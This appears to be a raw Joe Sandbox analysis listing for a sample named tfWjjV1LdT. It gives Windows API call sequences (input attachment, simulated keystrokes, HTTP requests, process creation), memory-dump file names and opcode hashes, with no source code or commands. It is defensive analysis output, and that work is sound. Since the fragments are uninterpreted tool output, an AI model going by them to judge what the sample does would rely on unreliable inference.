                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameParentSend_wcscmp
                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                            • API String ID: 1704125052-3381328864
                                                            • Opcode ID: b6a0222780e50b56b1e04e2eff55c61808e4d49143e5124ced2b3807ac9668d3
                                                            • Instruction ID: bc62d5ab38e82830fd417bc0f9bcec811853f6cfbc748022132160914ec90f61
                                                            • Opcode Fuzzy Hash: b6a0222780e50b56b1e04e2eff55c61808e4d49143e5124ced2b3807ac9668d3
                                                            • Instruction Fuzzy Hash: 2C1150B624D387BDFE142626EC17DE7379E9F05320B200016FA00A41D1FF6669525668
                                                            APIs
                                                            • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 006F7A6C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: ArraySafeVartype
                                                            • String ID:
                                                            • API String ID: 1725837607-0
                                                            • Opcode ID: 5be7fbcbbe08f326d9c0e05d25891407907c36de3133f4eb396086bd0c1760e0
                                                            • Instruction ID: 51990767acf66374df3d27e9f2d29b552e3452704fd9929d2fc16f9a25c74178
                                                            • Opcode Fuzzy Hash: 5be7fbcbbe08f326d9c0e05d25891407907c36de3133f4eb396086bd0c1760e0
                                                            • Instruction Fuzzy Hash: CAB18B7190420E9FDB00DFA8D885BFEB7B6EF09321F244429EA11E7291D734A941CBA4
                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 006F11F0
                                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,006F0268,?,00000001), ref: 006F1204
                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 006F120B
                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006F0268,?,00000001), ref: 006F121A
                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 006F122C
                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006F0268,?,00000001), ref: 006F1245
                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006F0268,?,00000001), ref: 006F1257
                                                            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,006F0268,?,00000001), ref: 006F129C
                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,006F0268,?,00000001), ref: 006F12B1
                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,006F0268,?,00000001), ref: 006F12BC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                            • String ID:
                                                            • API String ID: 2156557900-0
                                                            • Opcode ID: ed9c764da97b5286ba57108cd7b0c219500a8bcfbbd94f6d73f2bca5b6f0293e
                                                            • Instruction ID: cc1d995471b594f83da0c28e7b842a83d6de4a3b8080ab4e0d4042737b0c6cd9
                                                            • Opcode Fuzzy Hash: ed9c764da97b5286ba57108cd7b0c219500a8bcfbbd94f6d73f2bca5b6f0293e
                                                            • Instruction Fuzzy Hash: 35315475A00308FBDB10DF94EC44BF977AAAB56362F50C115FA05DB2E0D7B89E808B54
                                                            APIs
                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0069FAA6
                                                            • OleUninitialize.OLE32(?,00000000), ref: 0069FB45
                                                            • UnregisterHotKey.USER32(?), ref: 0069FC9C
                                                            • DestroyWindow.USER32(?), ref: 006D45D6
                                                            • FreeLibrary.KERNEL32(?), ref: 006D463B
                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 006D4668
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                            • String ID: close all
                                                            • API String ID: 469580280-3243417748
                                                            • Opcode ID: e938587d72700cb142dbbbfcd02bc86b1736fa07c6414e6665d46d74352d062b
                                                            • Instruction ID: 24c007ea3e73fb1ba9cbc78c83bc8f55a4bb87e6b21409cf82c7a87759962500
                                                            • Opcode Fuzzy Hash: e938587d72700cb142dbbbfcd02bc86b1736fa07c6414e6665d46d74352d062b
                                                            • Instruction Fuzzy Hash: FBA16A30701212CFDB69EF14C595AA9F76AAF05710F1582AEE80AAB761DF30EC16CF54
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearInit$_memset
                                                            • String ID: ,,r$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                            • API String ID: 2862541840-2506191893
                                                            • Opcode ID: 81b78619a8ae992e8bcd6ad5501a0b8ce29432d042c51d9d558ca99665a1b246
                                                            • Instruction ID: 34ea8a09cfc8e999212274f7e83218e3d597b3db4feec6824a3f6b57f59f8ca1
                                                            • Opcode Fuzzy Hash: 81b78619a8ae992e8bcd6ad5501a0b8ce29432d042c51d9d558ca99665a1b246
                                                            • Instruction Fuzzy Hash: 1F918E71A00219EBDF24DFA5C848FAEB7B8EF45710F108619FA15AB2C1D7789945CFA0
                                                            APIs
                                                            • EnumChildWindows.USER32(?,006EA439), ref: 006EA377
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: ChildEnumWindows
                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                            • API String ID: 3555792229-1603158881
                                                            • Opcode ID: 93df37cd5e3aa88566b909babbd088949008de56f3bf2e9c92457352a3a236bb
                                                            • Instruction ID: 5307beff802f74bc9850096b52263c6e601c9afe1b0d01924e58d69a55b72619
                                                            • Opcode Fuzzy Hash: 93df37cd5e3aa88566b909babbd088949008de56f3bf2e9c92457352a3a236bb
                                                            • Instruction Fuzzy Hash: 1E91E330601745AEDB48EFE1C441BEEFBA7BF04300F54812DE95AA7241DB307A99CBA5
                                                            APIs
                                                            • SetWindowLongW.USER32(?,000000EB), ref: 00692EAE
                                                              • Part of subcall function 00691DB3: GetClientRect.USER32(?,?), ref: 00691DDC
                                                              • Part of subcall function 00691DB3: GetWindowRect.USER32(?,?), ref: 00691E1D
                                                              • Part of subcall function 00691DB3: ScreenToClient.USER32(?,?), ref: 00691E45
                                                            • GetDC.USER32 ref: 006CCD32
                                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 006CCD45
                                                            • SelectObject.GDI32(00000000,00000000), ref: 006CCD53
                                                            • SelectObject.GDI32(00000000,00000000), ref: 006CCD68
                                                            • ReleaseDC.USER32(?,00000000), ref: 006CCD70
                                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 006CCDFB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                            • String ID: U
                                                            • API String ID: 4009187628-3372436214
                                                            • Opcode ID: 7d22232d72cb259713bbf59b836cce2fecdfbe4e729aee86c15e9c48264a27e5
                                                            • Instruction ID: e378ebc4df6fb053eac382d41150bce9131d5d75e825cf8abfc8d3b7885c10bf
                                                            • Opcode Fuzzy Hash: 7d22232d72cb259713bbf59b836cce2fecdfbe4e729aee86c15e9c48264a27e5
                                                            • Instruction Fuzzy Hash: DF71A231500205EFCF218F64C894EFA7BB6FF49320F14826EED5A5A2A6D7309891DB60
                                                            APIs
                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00701A50
                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00701A7C
                                                            • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00701ABE
                                                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00701AD3
                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00701AE0
                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00701B10
                                                            • InternetCloseHandle.WININET(00000000), ref: 00701B57
                                                              • Part of subcall function 00702483: GetLastError.KERNEL32(?,?,00701817,00000000,00000000,00000001), ref: 00702498
                                                              • Part of subcall function 00702483: SetEvent.KERNEL32(?,?,00701817,00000000,00000000,00000001), ref: 007024AD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                            • String ID:
                                                            • API String ID: 2603140658-3916222277
                                                            • Opcode ID: 8e8bdba6c0ef2cb5ce04b8e5a7d6db5747c276378063cc8e3dac04f70e30d4c4
                                                            • Instruction ID: 0d98623e5f9e6f8015bc73bf82563328a1a354c8b4fa23a6fe59d2e118005d23
                                                            • Opcode Fuzzy Hash: 8e8bdba6c0ef2cb5ce04b8e5a7d6db5747c276378063cc8e3dac04f70e30d4c4
                                                            • Instruction Fuzzy Hash: 98414FB1501218FFEB129F64CC89FFA77ACEB08354F408226F9059A1C1E7789E449BA4
                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0071F910), ref: 00708D28
                                                            • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0071F910), ref: 00708D5C
                                                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00708ED6
                                                            • SysFreeString.OLEAUT32(?), ref: 00708F00
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                            • String ID:
                                                            • API String ID: 560350794-0
                                                            • Opcode ID: c1e436f4743a31613baf3372ffd4c8badf65dea07a47bb7b8587f55fc85f4a78
                                                            • Instruction ID: 35793ca80dd6b0994b4d625e73f4cf55a27757bdac69523e503a2b46c6e1fe60
                                                            • Opcode Fuzzy Hash: c1e436f4743a31613baf3372ffd4c8badf65dea07a47bb7b8587f55fc85f4a78
                                                            • Instruction Fuzzy Hash: 13F17C71A00209EFDF44DF94C884EAEB7BAFF48314F108198F945AB291DB35AE45CB61
                                                            APIs
                                                            • _memset.LIBCMT ref: 0070F6B5
                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0070F848
                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0070F86C
                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0070F8AC
                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0070F8CE
                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0070FA4A
                                                            • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0070FA7C
                                                            • CloseHandle.KERNEL32(?), ref: 0070FAAB
                                                            • CloseHandle.KERNEL32(?), ref: 0070FB22
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                            • String ID:
                                                            • API String ID: 4090791747-0
                                                            • Opcode ID: b7b562134f730df1746263e2908f01133a46c69fb6dba7baa527cd1d844b7cc6
                                                            • Instruction ID: 9643f066e4f98d4858f611989c38abe196314d7a9e27ec55b850e11d10333934
                                                            • Opcode Fuzzy Hash: b7b562134f730df1746263e2908f01133a46c69fb6dba7baa527cd1d844b7cc6
                                                            • Instruction Fuzzy Hash: 58E1B071204301DFCB64EF24C891A6ABBE6AF85314F14866DF8998B6E1CB35EC41CB56
                                                            APIs
                                                              • Part of subcall function 006F466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,006F3697,?), ref: 006F468B
                                                              • Part of subcall function 006F466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,006F3697,?), ref: 006F46A4
                                                              • Part of subcall function 006F4A31: GetFileAttributesW.KERNEL32(?,006F370B), ref: 006F4A32
                                                            • lstrcmpiW.KERNEL32(?,?), ref: 006F4D40
                                                            • _wcscmp.LIBCMT ref: 006F4D5A
                                                            • MoveFileW.KERNEL32(?,?), ref: 006F4D75
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                            • String ID:
                                                            • API String ID: 793581249-0
                                                            • Opcode ID: dad6b095306be9c77c36dd410d5bccbbcbc751ac61d220976578da79d227f18a
                                                            • Instruction ID: 401ff29607110f97c21a0758dca5e31afc064dfde43a78ce7f49d8f9a7633b67
                                                            • Opcode Fuzzy Hash: dad6b095306be9c77c36dd410d5bccbbcbc751ac61d220976578da79d227f18a
                                                            • Instruction Fuzzy Hash: E5518AB21083895BC765DB64D881DEF73EDAF85350F00492EF289D3551EF34A688C75A
                                                            APIs
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 007186FF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: InvalidateRect
                                                            • String ID:
                                                            • API String ID: 634782764-0
                                                            • Opcode ID: 47deb86b98c3ba13f25a893b9da4e01e57475f7f016c51c57f762c493629e5a4
                                                            • Instruction ID: 8cf7a9bb5d7cd47c1fd167aa6c0458f13d4dcdcbd83a4a407073c14bd28041c7
                                                            • Opcode Fuzzy Hash: 47deb86b98c3ba13f25a893b9da4e01e57475f7f016c51c57f762c493629e5a4
                                                            • Instruction Fuzzy Hash: 2751AF30510244BEEFA09B6CCC89FE93BA5AB05720F704216F910E61E1DB7DE9C0CB56
                                                            APIs
                                                            • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 006CC2F7
                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 006CC319
                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 006CC331
                                                            • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 006CC34F
                                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 006CC370
                                                            • DestroyIcon.USER32(00000000), ref: 006CC37F
                                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 006CC39C
                                                            • DestroyIcon.USER32(?), ref: 006CC3AB
                                                              • Part of subcall function 0071A4AF: DeleteObject.GDI32(00000000), ref: 0071A4E8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                            • String ID:
                                                            • API String ID: 2819616528-0
                                                            • Opcode ID: 873130f321b8de9a356ce005524e92646a66594d2ae39181f6b051b2fc1f1f0b
                                                            • Instruction ID: 98753c2df33356369a25b3919813a23783362371f639bde429927c2509a2b55b
                                                            • Opcode Fuzzy Hash: 873130f321b8de9a356ce005524e92646a66594d2ae39181f6b051b2fc1f1f0b
                                                            • Instruction Fuzzy Hash: B7514A70600206EFDF20DF68DC55FAA37EAEB54320F10852DF90697690D7B4A991DB94
                                                            APIs
                                                              • Part of subcall function 006EA82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 006EA84C
                                                              • Part of subcall function 006EA82C: GetCurrentThreadId.KERNEL32 ref: 006EA853
                                                              • Part of subcall function 006EA82C: AttachThreadInput.USER32(00000000,?,006E9683,?,00000001), ref: 006EA85A
                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 006E968E
                                                            • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 006E96AB
                                                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 006E96AE
                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 006E96B7
                                                            • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 006E96D5
                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 006E96D8
                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 006E96E1
                                                            • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 006E96F8
                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 006E96FB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                            • String ID:
                                                            • API String ID: 2014098862-0
                                                            • Opcode ID: 1a2cf19ab4f7bc533ca2fd7d369353b1c126091834afe0db377ae7aa8b1fceb5
                                                            • Instruction ID: efacb8d2abcd5229bade6793797296b6d5fc66a0896001e4fc1bde93e34ef366
                                                            • Opcode Fuzzy Hash: 1a2cf19ab4f7bc533ca2fd7d369353b1c126091834afe0db377ae7aa8b1fceb5
                                                            • Instruction Fuzzy Hash: DE11E571910618BEF6106F65DC49FAA3F1EEB4C750F108429F244AB0E0C9F25C10DAB8
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,006E853C,00000B00,?,?), ref: 006E892A
                                                            • HeapAlloc.KERNEL32(00000000,?,006E853C,00000B00,?,?), ref: 006E8931
                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,006E853C,00000B00,?,?), ref: 006E8946
                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,006E853C,00000B00,?,?), ref: 006E894E
                                                            • DuplicateHandle.KERNEL32(00000000,?,006E853C,00000B00,?,?), ref: 006E8951
                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,006E853C,00000B00,?,?), ref: 006E8961
                                                            • GetCurrentProcess.KERNEL32(006E853C,00000000,?,006E853C,00000B00,?,?), ref: 006E8969
                                                            • DuplicateHandle.KERNEL32(00000000,?,006E853C,00000B00,?,?), ref: 006E896C
                                                            • CreateThread.KERNEL32(00000000,00000000,006E8992,00000000,00000000,00000000), ref: 006E8986
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                            • String ID:
                                                            • API String ID: 1957940570-0
                                                            • Opcode ID: e8ae9ebe34fe32be535aef3ff64b86083e17cb8c95a294794d22471bf1e547ea
                                                            • Instruction ID: 12d7008a925920e7139f5068b770cb4378d4960bd45147a4237b3a15519c2560
                                                            • Opcode Fuzzy Hash: e8ae9ebe34fe32be535aef3ff64b86083e17cb8c95a294794d22471bf1e547ea
                                                            • Instruction Fuzzy Hash: 7401ACB5640348FFE610ABA9DC49FAB3B6DEB89711F41C421FA05DB191CA749C009A24
                                                            Strings
                                                            Memory Dump Source
